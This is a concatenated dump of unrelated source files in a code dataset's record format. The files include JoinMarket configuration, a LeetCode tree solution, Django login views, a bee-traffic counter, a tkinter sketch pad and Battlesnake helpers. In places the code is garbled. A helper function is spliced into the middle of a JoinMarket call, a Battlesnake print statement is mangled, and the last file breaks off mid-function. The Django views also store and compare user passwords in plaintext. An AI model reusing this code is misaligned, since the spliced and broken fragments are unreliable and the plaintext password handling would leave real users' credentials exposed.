os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n log.debug(\"Joinmarket directory is: \" + str(jmkt_dir))\n global_singleton.config.readfp(io.BytesIO(defaultconfig))\n jmkt_config_location = os.path.join(jmkt_dir, global_singleton.config_location)\n loadedFiles = global_singleton.config.read([jmkt_config_location])\n # Create default config file if not found\n if len(loadedFiles) != 1:\n with open(jmkt_config_location, \"w\") as configfile:\n configfile.write(defaultconfig)\n\n # check for sections\n for s in required_options:\n if s not in global_singleton.config.sections():\n raise Exception(\n \"Config file does not contain the required section: \" + s)\n # then check for specific options\n for k, v in required_options.iteritems():\n for o in v:\n if o not in global_singleton.config.options(k):\n raise Exception(\n \"Config file does not contain the required option: \" + o +\\\n \" in section: \" + k)\n\n try:\n global_singleton.maker_timeout_sec = global_singleton.config.getint(\n 'TIMEOUT', 'maker_timeout_sec')\n except NoOptionError:\n log.debug('TIMEOUT/maker_timeout_sec not found in .cfg file, '\n 'using default value')\n\n # configure the interface to the blockchain on startup\n global_singleton.bc_interface = get_blockchain_interface_instance(\n global_singleton.config)\n #set the location of the commitments file\n try:\n global_singleton.commit_file_location = global_singleton.config.get(\n \"POLICY\", \"commit_file_location\")\n except NoOptionError:\n log.debug(\"No commitment file location in config, using default \"\n \"location cmttools/commitments.json\")\n btc.set_commitment_file(os.path.join(jmkt_dir,\n 
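# check_utxo_blacklist above is a read-check-append pattern over a flat file.
# The same idea in isolation (seen_before and the path are illustrative; note
# the real function above returns True when a commitment is still allowed):
import os

def seen_before(token, path='blacklist.txt', persist=False):
    entries = []
    if os.path.isfile(path):
        with open(path) as f:
            entries = [line.strip() for line in f]
    if token in entries:
        return True
    if persist:
        # Record the token so later calls reject it.
        with open(path, 'a') as f:
            f.write(token + '\n')
    return False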
global_singleton.commit_file_location))\n\ndef get_blockchain_interface_instance(_config):\n    # todo: refactor joinmarket module to get rid of loops\n    # importing here is necessary to avoid import loops\n    from joinmarket.blockchaininterface import BitcoinCoreInterface, \\\n        RegtestBitcoinCoreInterface, BlockrInterface\n    from joinmarket.blockchaininterface import CliJsonRpc\n\n    source = _config.get(\"BLOCKCHAIN\", \"blockchain_source\")\n    network = get_network()\n    testnet = network == 'testnet'\n    if source == 'bitcoin-rpc':\n        rpc_host = _config.get(\"BLOCKCHAIN\", \"rpc_host\")\n        rpc_port = _config.get(\"BLOCKCHAIN\", \"rpc_port\")\n        rpc_user = _config.get(\"BLOCKCHAIN\", \"rpc_user\")\n        rpc_password = _config.get(\"BLOCKCHAIN\", \"rpc_password\")\n        rpc = JsonRpc(rpc_host, rpc_port, rpc_user, rpc_password)\n        bc_interface = BitcoinCoreInterface(rpc, network)\n    elif source == 'json-rpc':\n        bitcoin_cli_cmd = _config.get(\"BLOCKCHAIN\",\n                                      \"bitcoin_cli_cmd\").split(' ')\n        rpc = CliJsonRpc(bitcoin_cli_cmd, testnet)\n        bc_interface = BitcoinCoreInterface(rpc, network)\n    elif source == 'regtest':\n        rpc_host = _config.get(\"BLOCKCHAIN\", \"rpc_host\")\n        rpc_port = _config.get(\"BLOCKCHAIN\", \"rpc_port\")\n        rpc_user = _config.get(\"BLOCKCHAIN\", \"rpc_user\")\n        rpc_password = _config.get(\"BLOCKCHAIN\", \"rpc_password\")\n        rpc = JsonRpc(rpc_host, rpc_port, rpc_user, rpc_password)\n        bc_interface = RegtestBitcoinCoreInterface(rpc)\n    elif source == 'blockr':\n        bc_interface = BlockrInterface(testnet)\n    else:\n        raise ValueError(\"Invalid blockchain source\")\n    return bc_interface\n","sub_path":"joinmarket/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":14249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"245360938","text":"import string\r\n\r\n\r\nalpha = string.ascii_uppercase + string.ascii_lowercase + string.digits + \"+/\"\r\nst = str(input(\"Input string to be ciphered: \"))\r\nlst = \" \".join(format(ord(x),\"b\") for x in st).split(\" \")\r\nprint(lst)\r\n# Pad each binary code with trailing zeros to a fixed 7-bit width; the\r\n# original nested while-loop appended to a loop-local copy and never exited.\r\nfor i, items in enumerate(lst):\r\n    print(items)\r\n    if len(items) != 7:\r\n        lst[i] = items.ljust(7, \"0\")\r\n\r\nprint(lst)","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"584767511","text":"# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\nfrom collections import deque\n\n\nclass Solution:\n    def isCousins(self, root: TreeNode, x: int, y: int) -> bool:\n        queue = deque([root])\n        while queue:\n            siblings, cousins = False, False\n            nodesAtThisDepth = len(queue)\n            for _ in range(nodesAtThisDepth):\n                node = queue.popleft()\n                if node is None:\n                    siblings = False\n                else:\n                    if node.val == x or node.val == y:\n                        if not cousins:\n                            cousins, siblings = True, True\n                        else:\n                            return not siblings\n                    queue.append(node.left) if node.left else None\n                    queue.append(node.right) if node.right else None\n                    queue.append(None)\n            if cousins:\n                return False\n        return False","sub_path":"LeetCode/Cousins in Binary Tree.py","file_name":"Cousins in Binary Tree.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"537235162","text":"from django.shortcuts import render, get_object_or_404, 
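# A quick sanity check for the isCousins solution above: 4 and 5 below sit at
# the same depth under different parents, so they are cousins. TreeNode is
# defined locally here only because LeetCode normally supplies it.
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

root = TreeNode(1, TreeNode(2, right=TreeNode(4)), TreeNode(3, right=TreeNode(5)))
# With the Solution class above: Solution().isCousins(root, 4, 5) -> True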
redirect\nfrom django.http import HttpResponse\nfrom django.template import RequestContext, loader\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom django.shortcuts import redirect\n\n\n# Exception # \nfrom django.core.exceptions import ObjectDoesNotExist\n\n# Django model & form #\nfrom google_with_mm_app.form import SearchKeyword\nfrom google_with_mm_app.models import TblUserInfo\nfrom google_with_mm_app.form import SigninForm\nfrom google_with_mm_app.form import SignupForm\n\n# Getting and Pasing json #\nimport urllib.request\nimport urllib.parse\nimport json\n\n\n# Create your views here.\ndef test(request):\n context={}\n return render(request, 'google_with_mm_app/test.html', context)\n\n@csrf_exempt\ndef search_main(request):\n if request.method == 'POST':\n #form=SearchKeyword(request.POST)\n keyword = request.POST.get('keyword')\n start = request.POST.get('start')\n rsz = request.POST.get('rsz')\n print ('keyword: '+keyword)\n print ('start:'+start)\n print ('rsz:'+rsz)\n \n obj = get_search_result(keyword, start, rsz, '60.173.26.241')\n \n return HttpResponse(\n json.dumps(obj),\n content_type=\"application/json\"\n )\n \n else: \n #return HttpResponse(\n # json.dumps({\"nothing to see\": \"this isn't happening\"}),\n # content_type=\"application/json\"\n #)\n\n context={}\n return render(request, 'google_with_mm_app/search_main.html', context)\n\n\ndef get_search_result(keyword, start, rsz,user_ip): \n \n# keyword=keyword.replace( \" \", \"+\")\n keyword=urllib.parse.quote(keyword)\n url = ('https://ajax.googleapis.com/ajax/services/search/web'\n '?v=1.0&q='\n +keyword\n +'&rsz='\n +rsz\n +'&start='\n +start\n +'&userip='\n +user_ip)\n print (\"get_search_result| keyword url | \"+url)\n request = urllib.request.Request(url)\n response = urllib.request.urlopen(request)\n ## urlopen isn't available global language. ## -- 20151007\n encoding = response.headers.get_content_charset()\n obj=json.loads(response.read().decode(encoding))\n \n print (obj)\n obj_ret= {}\n # JSON TEST CODE #\n results_num = len(obj['responseData']['results'])\n\n #for i in range(0, results_num):\n # obj_ret[i] = obj['responseData']['results'][i]\n # print (obj_ret)\n\n obj_ret = obj['responseData']\n return obj_ret\n\n\ndef signup(request):\n if request.method == 'POST': \n form = SignupForm(request.POST)\n print(form) \n if form.is_valid():\n\n v_usr_id = request.POST['usr_id']\n v_usr_pwd = request.POST['usr_pwd']\n v_usr_nm = request.POST['usr_nm']\n v_usr_email = request.POST['usr_email']\n print (v_usr_id)\n print (v_usr_pwd)\n print (v_usr_nm)\n print (v_usr_email)\n \n m = TblUserInfo(usr_id=v_usr_id, usr_pwd=v_usr_pwd, usr_nm=v_usr_nm, usr_email=v_usr_email)\n m.save(force_insert=True)\n \n request.session['usr_nm'] = m.usr_nm\n request.session['usr_id'] = m.usr_id\n request.session.get_expire_at_browser_close()\n\n print(request.session['usr_nm'])\n context = {}\n\n return redirect('/search/')\n #return render(request, 'google_with_mm_app/search_main.html', context) \n else:\n context = {\n 'message' : 'Signup Failed.. Sorry. Please fill all textbox!'\n }\n return render(request, 'google_with_mm_app/signup.html', context) \n else:\n context={\n 'message' : 'Welcome! 
Please fill all textbox to signup'\n }\n return render(request, 'google_with_mm_app/signup.html', context) \n\ndef signin(request):\n\n form = SigninForm(request.POST)\n print(form)\n if form.is_valid():\n try :\n m = TblUserInfo.objects.get(usr_id=request.POST['usr_id'])\n except ObjectDoesNotExist:\n context = {\n 'message': 'Your ID does not exist or password is incorrect!'\n }\n return render(request, 'google_with_mm_app/signin.html', context)\n\n if m.usr_pwd == request.POST['usr_pwd']:\n print(m.usr_nm)\n request.session['usr_nm'] = m.usr_nm\n request.session['usr_id'] = m.usr_id\n request.session.get_expire_at_browser_close()\n\n print(request.session['usr_nm'])\n context = {}\n #return render(request, 'google_with_mm_app/search_main.html', context)\n return redirect('/search/')\n\n else:\n context = {\n 'message': 'Your ID does not exist or password is incorrect!'\n }\n\n return render(request, 'google_with_mm_app/signin.html', context)\n\n else:\n context = {'message': 'Please Login !'}\n return render(request, 'google_with_mm_app/signin.html', context) \n\ndef signout(request):\n \n try:\n del request.session['usr_nm']\n del request.session['usr_id']\n except KeyError:\n pass\n\n context={ \n 'message' : 'Signed Out !' \n }\n return redirect('/search/')\n #return render(request, 'google_with_mm_app/search_main.html', context)\n\n","sub_path":"google_with_mm/google_with_mm_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"407992736","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nimport time\n\ndef auth_api_login(func):\n \"\"\"\n :param func:\n :return:\n \"\"\"\n def __(torn_self, *args, **kwargs):\n user_name = torn_self.get_secure_cookie('user_name')\n edu_session = torn_self.get_argument('edu_session', '')\n if not user_name and not edu_session:\n torn_self.set_status(401)\n return\n func(torn_self, *args, **kwargs)\n return __\n\ncom_cookie_time = 3600\ndef set_edu_cookie(set_obj, user_name, user_level, school_id=None):\n # 设置cookie\n set_obj.set_secure_cookie(\"user_name\", user_name, expires=time.time() + com_cookie_time)\n set_obj.set_secure_cookie(\"user_level\", str(user_level), expires=time.time() + com_cookie_time)\n if school_id:\n set_obj.set_secure_cookie(\"school_id\", school_id, expires=time.time() + com_cookie_time)\n","sub_path":"api/base_auth.py","file_name":"base_auth.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"580786834","text":"from datetime import date\nimport time\n\nfrom src import JobHdl\n\n__author__ = 'zhangzhao'\n\n\nclass MarkDownGenerator(object):\n def __init__(self, out_file_path: str, the_date=None):\n self.date = the_date\n self.final_string = ''\n self.out_put_path = out_file_path\n self.entry = JobHdl()\n self.final_status_string = ''\n self.final_comment_string = ''\n self.meta = '\\n
<hr/>This digest is generated automatically by OhMyLifeRecorder.<br/>\n' \\\n                    'You can get more information here: [https://github.com/zz090923610/OhMyLifeRecorder](https://github.com/zz090923610/OhMyLifeRecorder)'\n\n    def generate_daily_digest_header(self):\n        self.final_string += '<center><h1>OhMyLifeRecorder Daily Digest: ' + str(self.date) + '</h1></center>\n'\n\n\n    def generate_daily_digest_an_entry(self, job_entry):\n        entry = job_entry\n        temp_status_string = '\t\t<ul>\n'\n        temp_comment_string = '\t\t<ul>\n'\n        status_modified_today = False\n        comment_modified_today = False\n        for loop in entry.status_change_list:\n            if date.fromtimestamp(float(loop['time'])) == self.date:\n                status_modified_today = True\n                temp_status_string += '\t\t\t<li>' + time.strftime('%H:%M:%S ',\n                                                                 time.localtime(float(loop['time']))) + loop[\n                    'to'] + '</li>\n'\n        temp_status_string += '\t\t</ul>\n'\n        if status_modified_today is True:\n            self.final_status_string += '\t<li>Spent time on ' + entry.name + ':\n' + temp_status_string + '\t</li>\n'\n\n        for loop in entry.comment_list:\n            if date.fromtimestamp(float(loop['time'])) == self.date:\n                comment_modified_today = True\n                temp_comment_string += '\t\t\t<li>' + time.strftime('%H:%M:%S ',\n                                                                  time.localtime(float(loop['time']))) + \\\n                                       loop['content'] + '</li>\n'\n        temp_comment_string += '\t\t</ul>\n'\n        if comment_modified_today is True:\n            self.final_comment_string += '\t<li>Story about ' + entry.name + ':\n' + \\\n                                         temp_comment_string + '\t</li>\n'\n\n    def generate_daily_digest(self):\n        self.generate_daily_digest_header()\n        if (self.final_status_string == '') & (self.final_comment_string == ''):\n            self.final_string += '\n<br/>\n<br/>'\n        if self.final_status_string != '':\n            self.final_string += '<center><h3>What I\'ve done today:</h3></center>\n'\n            self.final_string += '\n<ul>\n' + self.final_status_string + '</ul>\n'\n        if self.final_comment_string != '':\n            self.final_string += '<center><h3>Diary:</h3></center>\n'\n            self.final_string += '\n<ul>\n' + self.final_comment_string + '</ul>\n'\n        self.final_string += self.meta\n        self.write_out()\n        return self.final_string\n\n    def generate_job_header(self):\n        self.final_string += '<center><h1>OhMyLifeRecorder Digest</h1></center>\n'\n        self.final_string += '<center><h2>' + self.entry.name + '</h2></center>\n'\n        self.final_string += 'Created: ' + time.strftime(\n            '%Y-%m-%d, %H:%M:%S ', time.localtime(self.entry.create_time)) + '\n\n'\n        self.final_string += 'Status: ' + self.entry.status + ' since ' + time.strftime(\n            '%Y-%m-%d, %H:%M:%S ', time.localtime(self.entry.status_change_time)) + '\n\n'\n\n    def generate_status_change_data(self):\n        self.final_string += '<center><h3>Status change history:</h3></center>\n<ul>\n'\n        for loop in self.entry.status_change_list:\n            self.final_string += '<li>' + time.strftime('%m-%d, %H:%M:%S: ', time.localtime(float(loop['time']))) + \\\n                                 'status changed from ' + \\\n                                 loop['from'] + ' to ' + loop['to'] + '</li>\n'\n        self.final_string += '\n</ul>\n'\n\n    def generate_comments(self):\n        self.final_string += '<center><h3>Diary:</h3></center>\n<ul>\n'\n        for loop in self.entry.comment_list:\n            self.final_string += '<li>' + time.strftime('%m-%d, %H:%M:%S: ',\n                                                        time.localtime(float(loop['time']))) + loop['content'] + \\\n                                 '</li>\n'\n    def write_out(self):\n        with open(self.out_put_path, mode='w', encoding='utf-8') as a_file:\n            a_file.write(self.final_string)\n\n    def generate_process(self):\n        self.generate_job_header()\n        self.generate_status_change_data()\n        self.generate_comments()\n        self.write_out()","sub_path":"legacy/src/markdown_generator.py","file_name":"markdown_generator.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"184095481","text":"from datetime import datetime\nfrom Tracking.iou_tracker import Tracker\nfrom collections import OrderedDict\nfrom collections import Counter\nfrom tqdm import tqdm\nimport numpy as np\nimport sqlite3\nimport cv2\n\nDB_PATH = '/Users/pascal/Coding/MP_bees/object_tracking/bees.db'\n# PATH_TO_VIDEO = '/Users/pascal/Coding/MP_bees/simple_object_tracking/videos/Froh_23_20191013_075648_540_M.mp4'\n# PATH_TO_VIDEO = '/Users/pascal/Coding/MP_bees/videos/bees_2.mp4'\nPATH_TO_VIDEO = '/Users/pascal/Coding/MP_bees/object_tracking/videos/' \\\n                '118_Doettingen_Hive1_200820_gopro8_1080_200fps_W_short.mp4'\n# ALT_PATH_TO_VIDEO = '/content/gdrive/My Drive/Bees/data/Froh_23_20191013_075648_540_M.mp4'\nALT_PATH_TO_VIDEO = '/content/gdrive/My Drive/Bees/data/high_fps/' \\\n                    '118_Doettingen_Hive1_200820_gopro8_1080_100fps_W_short.mp4'\nRUN_ID = 28\nPLOT = False\n\n\nconn = sqlite3.connect(DB_PATH)\nc = conn.cursor()\n\n\ndef get_coordinates_from_db(run_id, video, frame_nr):\n    c.execute(\n        \"select * from coordinates where run_id = {} and video = '{}' and frame = {}\".format(run_id, video, frame_nr))\n    return c.fetchall()\n\ncap = cv2.VideoCapture(PATH_TO_VIDEO)\nfps = int(cap.get(cv2.CAP_PROP_FPS))\nwidth = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\nheight = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\ndateTimeObj = datetime.now()\ntime_stamp = dateTimeObj.strftime(\"%d_%b_%Y_%H_%M_%S.%f\")\n\nskip_param = 8\nfps = fps / skip_param\nprint(fps)\n\n# dist_threshold, max_frame_skipped, max_trace_length, iou_threshold\nif fps == 200:\n    ct = Tracker(50, 20, 50, 0.5)\nif fps == 100:\n    ct = Tracker(100, 15, 50, 0.2)\nif fps == 50:\n    ct = Tracker(150, 10, 50, 0.005)\nif fps == 25:\n    ct = Tracker(250, 5, 50, 0.0025)\n\ndetections = []\n\n# Create blank image for entrance contour detection\n\nblank_image = np.zeros((height, width, 3), np.uint8)\nblank_image[:, :] = (255, 255, 255)\n\nimg_center_x = width // 2 - 55\nimg_center_y = height // 2 - 20\n# for united queens circle!\n# cv2.circle(blank_image, (img_center_x, img_center_y), 135, (0, 0, 0), 5)\ncv2.rectangle(blank_image, (660, 190), (1085, 260), (0, 0, 0),\n              5)  # first tuple is the start, second tuple the end coordinates\n\ngray = cv2.cvtColor(blank_image, cv2.COLOR_BGR2GRAY)\ngray = cv2.bilateralFilter(gray, 11, 17, 17)\nedged = cv2.Canny(gray, 200, 800, 1)\ncontours = cv2.findContours(edged, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\ncontours = contours[0] if len(contours) == 2 else contours[1]\n\ntraffic_dict = OrderedDict()\nbee_in = 0\nbee_out = 0\nactivity = \"\"\n\nframe = 0\nframe_counter = 0\nall_tracks = {}\nin_counted = []\nout_counted = []\n\ntotal_matches, total_no_matches = [], []\n\nc.execute(\"select max(frame) from coordinates where run_id = {}\".format(RUN_ID))\nmax_frame = c.fetchall()[0][0]\n\nfor frame in tqdm(range(1, max_frame, skip_param)):\n    coordinates = get_coordinates_from_db(RUN_ID, ALT_PATH_TO_VIDEO, frame)\n    frame_counter += 1\n\n    rects = []\n    for i in range(len(coordinates)):\n        r_id, f_name, fr, b_id, xmin, xmax, 
ymin, ymax, X, Y, conf = coordinates[i]\n rects.append([xmin, ymin, xmax, ymax])\n\n objects, tracks, D, iou_scores, match, no_match = ct.update(rects)\n\n total_matches.append(match)\n total_no_matches.append(no_match)\n\n if PLOT:\n for key, values in tracks.items():\n if key not in all_tracks:\n all_tracks[key] = values\n else:\n all_tracks[key].append(values[-1])\n\n for (objectID, coordinates) in objects.items():\n if len(traffic_dict) == 0:\n traffic_dict[objectID] = []\n\n for cnt in contours:\n centroid_x = coordinates[0] + (coordinates[2] - coordinates[0]) // 2\n centroid_y = coordinates[1] + (coordinates[3] - coordinates[1]) // 2\n centroid = (centroid_x, centroid_y)\n res = cv2.pointPolygonTest(cnt, (centroid_x, centroid_y), False)\n traffic_dict[objectID].append(res)\n\n IN = False\n if res == 1 or res == 0:\n IN = True\n\n try:\n len(traffic_dict[objectID + 1])\n except KeyError:\n traffic_dict[objectID + 1] = []\n\n if len(traffic_dict) > 0:\n for tb_id, tb_value in traffic_dict.items():\n if len(tb_value) == 0:\n continue\n if tb_id not in objects:\n last_counter = Counter(tb_value[-20:])\n total_counter = Counter(tb_value)\n if tb_value[0] == -1 and total_counter[-1] >= fps // 20 and last_counter[1] >= fps // 20:\n bee_in += 1\n traffic_dict[tb_id] = []\n activity = \"Bee {} flew in\".format(tb_id)\n in_counted.append(tb_id)\n if tb_value[0] == 1 and total_counter[1] >= fps // 20 and last_counter[-1] >= fps // 20:\n bee_out += 1\n traffic_dict[tb_id] = []\n activity = \"Bee {} flew out\".format(tb_id)\n out_counted.append(tb_id)\n\n info = [(\"Frame\", frame), (\"FPS\", fps), (\"Last activity\", activity), (\"Nr of Bees\", int(len(objects))),\n (\"Out\", bee_out),\n (\"In\", bee_in)]\n\n if frame_counter % 100 == 0:\n break\n print(info)\n print(traffic_dict)\n\n\nif PLOT:\n for cnt in contours:\n cv2.drawContours(blank_image, [cnt], -1, (36, 255, 12), 2)\n\n\n disappeared = out_counted + in_counted\n for id in disappeared:\n if id in all_tracks.keys():\n for point in all_tracks[id]:\n if id in out_counted:\n color = (255,0,0)\n elif id in in_counted:\n color = (0,255,0)\n cv2.circle(blank_image, (point[0], point[1]), 1, color, -1)\n cv2.putText(blank_image, str(id), (point[0] - 30, point[1] + 30), 0, 0.7,\n color, 1)\n for (i, (k, v)) in enumerate(info):\n text = \"{}: {}\".format(k, v)\n cv2.putText(blank_image, text, (10, int(height) - ((i * 20) + 20)), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\n (0, 0, 0),\n 1)\n\n\n import matplotlib.pyplot as plt\n fig1 = plt.figure()\n plt.imshow(blank_image)\n plt.show()\n fig1.savefig('example.png', dpi = 1000)\n\nprint(info)\nconn.close()\n","sub_path":"headless_counting.py","file_name":"headless_counting.py","file_ext":"py","file_size_in_byte":6343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"579287776","text":"# -*- coding: utf-8 -*-\r\nimport socket\r\n\r\n\r\ndef socket_get_way(host, port, socket_package):\r\n BufferSize = 1024 * 1000\r\n coon = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n coon.connect((host, port))\r\n coon.sendall(socket_package.encode('utf8'))\r\n receive_data = coon.recv(BufferSize)\r\n return receive_data","sub_path":"basic/socket_request_way.py","file_name":"socket_request_way.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"13306070","text":"import tkinter as tk\nfrom PIL import ImageGrab\n\nwindow = tk.Tk()\n\nwindow.title('UI')\n\n\ncanvas = 
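# The traffic_dict bookkeeping above decides "in" vs "out" from the first
# sample and the most recent samples of inside(+1)/outside(-1) flags for each
# track. A simplified version of that rule (classify and the thresholds are
# illustrative, not the exact cutoffs used above):
from collections import Counter

def classify(track, recent=5, min_hits=2):
    last = Counter(track[-recent:])
    if track[0] == -1 and last[1] >= min_hits:
        return 'in'    # started outside the entrance region, now inside
    if track[0] == 1 and last[-1] >= min_hits:
        return 'out'   # started inside, now outside
    return None

assert classify([-1, -1, 1, 1, 1]) == 'in'
assert classify([1, 1, -1, -1, -1]) == 'out'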
tk.Canvas(window,width = 512,height = 512,bg='white')\ncanvas.pack()\n\n\ndef paint(event):\n    x1, y1 = (event.x - 3), (event.y - 3)\n    x2, y2 = (event.x + 3), (event.y + 3)\n    canvas.create_oval(x1, y1, x2, y2, fill='black')\n    #canvas.create_oval(x1, y1, x2, y2)\n\ncanvas.bind(\"<B1-Motion>\", paint)\n\ndef submit():\n    print('set')\n\ndef clear():\n    canvas.delete(\"all\")\n\ndef save():\n    x = window.winfo_rootx() + canvas.winfo_x() + 2\n    y = window.winfo_rooty() + canvas.winfo_y() + 2\n    x1 = x + canvas.winfo_width() - 4\n    y1 = y + canvas.winfo_height() - 4\n    ImageGrab.grab().crop((x, y, x1, y1)).save(\"temp.jpg\")\n\n\nsubmit_bt = tk.Button(window, text='submit', font=('Arial', 18), width=10, height=1, command = submit)\nsubmit_bt.pack(side='left')\n\nclear_bt = tk.Button(window, text='clear', font=('Arial', 18), width=10, height=1, command = clear)\nclear_bt.pack(side='left')\n\nsave_bt = tk.Button(window, text='save', font=('Arial', 18), width=10, height=1, command = save)\nsave_bt.pack(side='left')\n\nwindow.mainloop()","sub_path":"UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"363989066","text":"\n# coding: utf-8\n\n# In[2]:\n\nimport pandas as pd\nimport numpy as np\nfrom pandas import DataFrame\n\n\n# In[103]:\n\nframe = pd.read_csv('\\\\Users\\\\kruts\\\\DataAnalysis4Python_Spring17\\\\Assignments\\\\Assignment 3\\\\Data\\\\movies_awards.csv')\n\n\n# In[104]:\n\n#Creating a dataframe with only Awards\ndf= DataFrame(frame, columns = ['Awards'])\n#Eliminating rows with value 'NaN'\ndf = df.dropna() \n\n\n# In[110]:\n\n# Fetching the wins and nominations from the awards column\ndf['Awards_won']= df['Awards'].str.extract('(\\d+) win',expand = True)\ndf['Awards_nominated'] = df['Awards'].str.extract('(\\d+) nomination',expand = True)\ndf['Prime_Awards_won'] = df['Awards'].str.extract('Won (\\d+) Primetime',expand = True)\ndf['Prime_Awards_nominated'] = df['Awards'].str.extract('Nominated for (\\d+) Primetime',expand = True)\ndf['Bafta_Awards_won'] = df['Awards'].str.extract('Won (\\d+) BAFTA',expand = True)\ndf['Bafta_Awards_nominated'] = df['Awards'].str.extract('Nominated for (\\d+) BAFTA',expand = True)\ndf['Oscar_Awards_won'] = df['Awards'].str.extract('Won (\\d+) Oscar',expand = True)\ndf['Oscar_Awards_nominated'] = df['Awards'].str.extract('Nominated for (\\d+) Oscar',expand = True)\ndf['GoldenGlobe_Awards_won'] = df['Awards'].str.extract('Won (\\d+) Golden Globe',expand = True)\ndf['GoldenGlobe_Awards_nominated'] = df['Awards'].str.extract('Nominated for (\\d+) Golden Globe',expand = True)\n\n\n# In[111]:\n\ndf = df.fillna(0)\ndf\n\n\n# In[115]:\n\n# Converting objects to int\ndf['Awards_won'] = df['Awards_won'].astype(str).astype(int)\ndf['Awards_nominated'] =df['Awards_nominated'].astype(str).astype(int) \ndf['Prime_Awards_won'] = df['Prime_Awards_won'].astype(str).astype(int)\ndf['Prime_Awards_nominated']=df['Prime_Awards_nominated'].astype(str).astype(int)\ndf['Bafta_Awards_won']=df['Bafta_Awards_won'].astype(str).astype(int) \ndf['Bafta_Awards_nominated']=df['Bafta_Awards_nominated'].astype(str).astype(int)\ndf['Oscar_Awards_won']=df['Oscar_Awards_won'].astype(str).astype(int) \ndf['Oscar_Awards_nominated']=df['Oscar_Awards_nominated'].astype(str).astype(int)\ndf['GoldenGlobe_Awards_won']=df['GoldenGlobe_Awards_won'].astype(str).astype(int)\ndf['GoldenGlobe_Awards_nominated']=df['GoldenGlobe_Awards_nominated'].astype(str).astype(int)\n\n\n# 
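# The str.extract calls above pull counts out of IMDb-style award strings;
# the same patterns work with plain re (the awards text here is made up):
import re

awards = 'Won 2 Oscars. Another 150 wins & 87 nominations.'
assert re.search(r'Won (\d+) Oscar', awards).group(1) == '2'
assert re.search(r'(\d+) win', awards).group(1) == '150'
assert re.search(r'(\d+) nomination', awards).group(1) == '87'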
In[79]:\n\ndf['Awards_won'] = df['Awards_won']+df['Prime_Awards_won']+df['Bafta_Awards_won']+df['Oscar_Awards_won']+df['GoldenGlobe_Awards_won']\ndf['Awards_nominated']=df['Awards_nominated']+df['Prime_Awards_nominated']+df['Bafta_Awards_nominated']+df['Oscar_Awards_nominated']+df['GoldenGlobe_Awards_nominated']\n\n\n# In[113]:\n\nprint(df.head())\n\n\n# In[114]:\n\ndf.to_csv('Q4_Part_1.csv') #Generating csv for the above result\n\n","sub_path":"Assignment3/Q4_Part_1.py","file_name":"Q4_Part_1.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"613200192","text":"from maths import distance_between\ndef assign(target):\n u = {\n \"x\":target['x'],\n \"y\":target['y'] + 1,\n }\n d = {\n \"x\":target['x'],\n \"y\":target['y'] - 1,\n }\n r = {\n \"x\":target['x'] + 1,\n \"y\":target['y'],\n }\n l = {\n \"x\":target['x'] - 1,\n \"y\":target['y'],\n }\n return u, d, l, r\n\ndef getPossibleMoves(bodies, startCoord, data, mybody, trapped = False, shouldprint = False):\n open_squares = [startCoord]\n if startCoord in bodies:\n return 0\n width = data['board']['width']\n height = data['board']['height']\n DANGER = 0\n for i in range(2):\n for coord in open_squares:\n temp_coords = []\n temp_coords = assign(coord)\n for minicoord in temp_coords:\n if len(open_squares) > len(mybody):\n break\n if shouldprint:\n print(-1 len(data['board']['snakes'][i]['body']):\n heads.append(data['board']['snakes'][i]['head'])\n return heads\n\ndef get_dangerous_heads(data):\n heads = []\n for i in range(len(data['board']['snakes'])):\n if len(data['you']['body']) <= len(data['board']['snakes'][i]['body']) and data['board']['snakes'][i]['name'] != data['you']['name']:\n heads.append(data['board']['snakes'][i]['head'])\n return heads\n\ndef getBodies(data):\n bodies = []\n for j in range(len(data['board']['snakes'])):\n for k in range(len(data['board']['snakes'][j]['body']) - 1):\n #wow so many brackets\n bodies.append(data['board']['snakes'][j]['body'][k])\n return bodies\n\ndef indvBodies(data):\n bodies = []\n for j in range(len(data['board']['snakes'])):\n thisBody= []\n for k in range(len(data['board']['snakes'][j]['body']) - 1):\n #wow so many brackets\n thisBody.append(data['board']['snakes'][j]['body'][k])\n bodies.append(thisBody)\n return bodies\n\ndef safe(target, oh, ob, myh, mb):\n #oh for other's heads\n\n #ob for other's bodies\n close_units = []\n for i in range(3):\n y = target['y'] + i - 1\n for j in range(3):\n x = target['x'] + j - 1\n dct = {\n \"x\":x,\n \"y\":y,\n }\n #print(dct)\n if dct in oh:\n for body in ob:\n if body[0] == dct:\n length = len(body)\n #print(length)\n if length >= len(mb):\n close_units.append(dct)\n return close_units\ndef onlyOneWayToGo(data, target, shouldPrint):\n body = 